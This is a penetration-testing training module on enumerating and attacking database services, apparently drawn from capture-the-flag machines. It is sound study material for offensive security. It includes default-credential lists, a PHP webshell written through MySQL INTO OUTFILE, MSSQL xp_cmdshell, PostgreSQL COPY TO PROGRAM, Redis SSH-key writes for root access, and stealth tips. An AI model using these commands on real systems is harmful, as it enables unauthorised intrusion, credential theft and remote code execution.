Back to All Modules

Database Enumeration

#Overview

Database services run on well-known ports (MySQL/MariaDB on 3306, MSSQL on 1433, PostgreSQL on 5432, Oracle on 1521, MongoDB on 27017, Redis on 6379) and are frequent targets for enumeration. The goal is to identify the DBMS and version, test default credentials, enumerate accessible databases/tables, and assess stored procedure capabilities (e.g., xp_cmdshell on MSSQL). Databases often contain credentials, personal data, and application secrets, making them high-value targets for both initial access and post-exploitation data gathering.

#Prerequisites

  • Tools: nmap (service detection and NSE scripts), DB-specific clients (mysql, psql, sqlcmd, mssqlclient.py, redis-cli, mongo), Hydra, netexec
  • Access Level: Network access to database ports; credentials may be required

#Detection & Enumeration

#Service Detection and Version Identification

# nmap service detection for database ports
nmap -sV -p 1433,3306,5432,1521,27017,6379 10.10.10.161

# nmap database-specific NSE scripts
nmap --script ms-sql-info -p 1433 10.10.11.236
nmap --script mysql-info -p 3306 10.10.10.161
nmap --script pgsql-brute -p 5432 10.10.10.161
nmap --script oracle-tns-version -p 1521 10.10.10.161
nmap --script mongodb-info -p 27017 10.10.10.161
nmap --script redis-info -p 6379 10.10.10.161
BASH

#Default Credential Testing

Test these first before attempting brute-force:

DBMSCommon Defaults
MySQL/MariaDBroot:(blank), root:root, root:toor, admin:admin
MSSQLsa:(blank), sa:sa, sa:password, MSSQL$SQLEXPRESS with Windows auth
PostgreSQLpostgres:(blank), postgres:postgres, postgres:password
Oraclesystem:manager, sys:change_on_install, scott:tiger, dbsnmp:dbsnmp
MongoDB(no auth by default on older versions)
Redis(no auth by default; if auth enabled, check redis.conf)

#MySQL / MariaDB (Port 3306)

# Connect with client
mysql -h 10.10.10.161 -u root -p
mysql -h 10.10.10.161 -u root --password=""

# Enumeration commands after connection
SHOW DATABASES;
USE <database_name>;
SHOW TABLES;
SELECT * FROM <table_name>;
SELECT User, Host, authentication_string FROM mysql.user;  # MySQL 5.7+
SELECT User, Host, Password FROM mysql.user;               # MySQL 5.6 and below

# Read local files (requires FILE privilege)
SELECT LOAD_FILE('/etc/passwd');

# Write to files (requires FILE privilege) -- used for webshells
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

# Check MySQL version for privilege escalation paths
SELECT VERSION();
SHOW VARIABLES LIKE '%version%';

# Check user privileges
SHOW GRANTS FOR CURRENT_USER;

# UDF (User Defined Function) privilege escalation check
SHOW VARIABLES LIKE 'plugin_dir';

# Credentials in application database tables
SELECT * FROM <app_db>.users;
BASH

#Microsoft SQL Server (Port 1433)

# Impacket mssqlclient (Windows authentication)
impacket-mssqlclient domain/user:pass@10.10.11.236 -windows-auth
impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth

# SQL authentication
impacket-mssqlclient sa:password@10.10.10.161

# SQL shell commands
SQL> SELECT @@VERSION;                     # SQL Server version
SQL> SELECT name FROM sys.databases;      # List databases
SQL> SELECT DB_NAME();                    # Current database
SQL> USE <db>;                             # Switch database
SQL> SELECT name FROM sys.tables;          # Current DB tables
SQL> SELECT * FROM <table>;

# xp_dirtree -- list filesystem directories (no xp_cmdshell needed)
SQL> xp_dirtree C:\
SQL> xp_dirtree \inetpub\wwwroot\

# xp_cmdshell -- command execution (must be enabled)
SQL> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL> xp_cmdshell 'whoami';

# Check xp_cmdshell status
SQL> EXEC sp_configure 'xp_cmdshell';

# Linked servers (lateral movement)
SQL> SELECT * FROM sys.servers;
SQL> EXEC ('SELECT @@VERSION') AT [LINKED_SERVER_NAME];

# Enumerate SQL logins
SQL> SELECT name, type_desc, is_disabled FROM sys.server_principals WHERE type IN ('S','U');
SQL> SELECT name FROM sys.database_principals;
BASH

MSSQL enumeration via netexec:

netexec mssql 10.10.10.161 -u sa -p password --local-auth
netexec mssql 10.10.10.161 -u user -p pass -d domain.htb -M mssql_priv
BASH

#PostgreSQL (Port 5432)

# Connect locally or remotely
psql -h 10.10.10.161 -U postgres
psql -h 10.10.10.161 -U postgres -d template1

# Enumeration commands
\list                              # List databases
\c <database_name>                 # Connect to a database
\dt                                # List tables in current database
SELECT * FROM <table_name>;
SELECT current_user;
SELECT version();

# Read files (requires superuser)
CREATE TABLE read_file(output text);
COPY read_file FROM '/etc/passwd';
SELECT * FROM read_file;

# RCE via COPY FROM PROGRAM (requires superuser, PG 9.3+)
COPY (SELECT '') TO PROGRAM 'id';

# User defined functions for privilege escalation
SELECT lanname, lanpltrusted FROM pg_language;
BASH

#Oracle (Port 1521)

# nmap TNS enumeration
nmap --script oracle-sid-brute -p 1521 10.10.10.161
nmap --script oracle-tns-version -p 1521 10.10.10.161

# ODAT (Oracle Database Attacking Tool) -- enumeration
odat all -s 10.10.10.161 -p 1521

# tnscmd (TNS command tool)
tnscmd10g version -h 10.10.10.161 -p 1521

# SQLPlus connection (if credentials found)
sqlplus system/password@10.10.10.161:1521/XE

# Basic Oracle enumeration after connection
SELECT * FROM all_users;
SELECT name FROM v$database;
SELECT * FROM v$version;
BASH

#NoSQL Databases

MongoDB (Port 27017)

# Connect (no auth on many default installs)
mongo 10.10.10.161

# Enumeration commands
show dbs;
use <database>;
show collections;
db.<collection>.find().pretty();
db.getUsers();
show roles;
BASH

Redis (Port 6379)

# Connect (no auth on default installs)
redis-cli -h 10.10.10.161

# Enumeration commands
INFO             # Server information and statistics
CLIENT LIST      # Connected clients
CONFIG GET *     # Server configuration (may contain passwords)
KEYS *           # List all keys
GET <key>        # Retrieve key value
FLUSHALL         # Delete all keys (destructive!)

# RCE via Redis (write SSH key or cron job if running as root)
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET key "\\n\\n<ssh-public-key>\\n\\n"
SAVE
BASH

CouchDB (Port 5984)

curl http://10.10.10.161:5984/
curl http://10.10.10.161:5984/_all_dbs
curl http://10.10.10.161:5984/_users/_all_docs
BASH

#Additional Database Commands

# NetExec MSSQL modules
nxc mssql <target> -u sa -p pass --local-auth                     # Local authentication
nxc mssql <target> -u sa -p pass --query 'SELECT name FROM sys.databases'  # Execute SQL query
nxc mssql <target> -u sa -p pass -M mssql_priv                    # Check MSSQL privileges
nxc mssql <target> -u sa -p pass --put-file local_file remote_path  # Upload file
nxc mssql <target> -u sa -p pass --get-file remote_path local_file # Download file

# MySQL SSL bypass
mysql -h 10.10.10.10 -u root -p --skip-ssl          # Skip SSL verification
mysql -h 10.10.10.10 -u root -p -e "SHOW GRANTS"   # Check user grants

# Redis authenticated access
redis-cli -h 10.10.10.10 CONFIG GET requirepass    # Check if password is set
redis-cli -h 10.10.10.10 -a <password> PING       # Authenticate and test connection

# MongoDB no-auth enumeration
mongo --host 10.10.10.10 --eval 'db.adminCommand({listDatabases:1})'
mongo --host 10.10.10.10 --eval 'db.getCollectionNames()'  # List collections
BASH

#Common Pitfalls

  • MSSQL authentication with -windows-auth requires the domain to resolve. Ensure the DC hostname is in /etc/hosts.
  • MySQL old_password vs new_password format (pre-4.1 vs 4.1+). Old hashes (16 bytes) can be cracked differently from new ones (41 bytes starting with *).
  • Oracle SID brute-forcing takes time. Common SIDs to try first: XE, ORCL, ORACLE, TEST, DEV, PROD.
  • MSSQL xp_dirtree works without xp_cmdshell enabled. This is a critical distinction -- you can enumerate files even without command execution.
  • Redis keys may be binary-encoded. Use DUMP <key> for hex representation if GET returns garbled output.
  • MongoDB authentication may use SCRAM-SHA-1 or x.509 certificates. Unauthenticated access is possible on older versions.
  • Database services may listen only on 127.0.0.1 -- not externally exposed. Check with ss -tlnp or netstat -ano after gaining a foothold.

#OPSEC Considerations

  • Database connection attempts are logged by all major DBMS (MySQL general_log, MSSQL SQL Server Log, PostgreSQL pg_log). Connection source IP, username, and timestamp are recorded.
  • Failed login attempts generate error log entries. Multiple failed attempts from the same IP trigger account lockout or IP-based blocking on some configurations.
  • xp_cmdshell usage on MSSQL is a critical security event. Enabling it triggers SQL Server audit events. Using xp_dirtree for filesystem enumeration is stealthier.
  • SHOW DATABASES and schema enumeration generates query log entries. A session that connects and immediately enumerates schemas is a reconnaissance IOC.
  • Redis INFO and CONFIG GET commands reveal server internals. These are standard admin commands but unusual from unexpected IPs.
  • MongoDB unauthenticated access is an audit finding in itself. Many vulnerability scanners flag open MongoDB instances.
  • Database brute-force (Hydra, medusa against MySQL/MSSQL/PG ports) is extremely noisy and generates one log entry per failed attempt. Avoid unless absolutely necessary.
  • Connections from attacker IPs to database ports are logged by network firewalls. Database ports (3306, 1433, 5432) should never accept connections from non-application IPs.

#Post-Exploitation Value

  • Database credentials often match credentials for other services (SSH, WinRM, RDP) due to password reuse.
  • Application databases contain user tables with credentials (hashed or cleartext) for the web application.
  • MSSQL xp_cmdshell provides command execution as the SQL Server service account (often SYSTEM or a domain account).
  • PostgreSQL COPY FROM PROGRAM provides command execution as the postgres user from version 9.3+.
  • MySQL SELECT LOAD_FILE() can read sensitive files like /etc/passwd or web config files if the FILE privilege is granted.
  • Redis RCE via SSH key/cron job write provides privilege escalation when Redis runs as root.
  • Linked servers in MSSQL provide lateral movement paths to other database servers in the network.

#Cross-References

#Tool References

ToolDescriptionLink
mysqlMySQL/MariaDB clientBuilt into most Linux distros
psqlPostgreSQL clientBuilt into most Linux distros
sqlcmd / osqlMSSQL command-line clients (Windows)Built into Windows / SQL Server
mssqlclient.pyImpacket MSSQL client (cross-platform)https://github.com/fortra/impacket
ODATOracle Database Attacking Toolhttps://github.com/quentinhardy/odat
redis-cliRedis command-line clientBuilt into Redis installation
mongoMongoDB shell clienthttps://www.mongodb.com/try/download/shell
netexec (nxc)Multi-protocol pentesting with MSSQL modulehttps://github.com/Pennyw0rth/NetExec
nmap (NSE scripts)Database service detection and brute-forcehttps://nmap.org/

#Source Machines

  • Manager (Medium, AD/Windows) -- MSSQL on port 1433, accessed with operator:operator credentials via Windows auth; xp_dirtree reveals website backup ZIP in web root
  • BoardLight (Easy, Linux) -- MySQL on localhost (3306), credentials from conf.php (dolibarrowner:serverfun2$2023!!)
  • Cascade (Medium, AD) -- SQLite database (Audit.db) found on SMB share, sqlitebrowser used to inspect encrypted LDAP credentials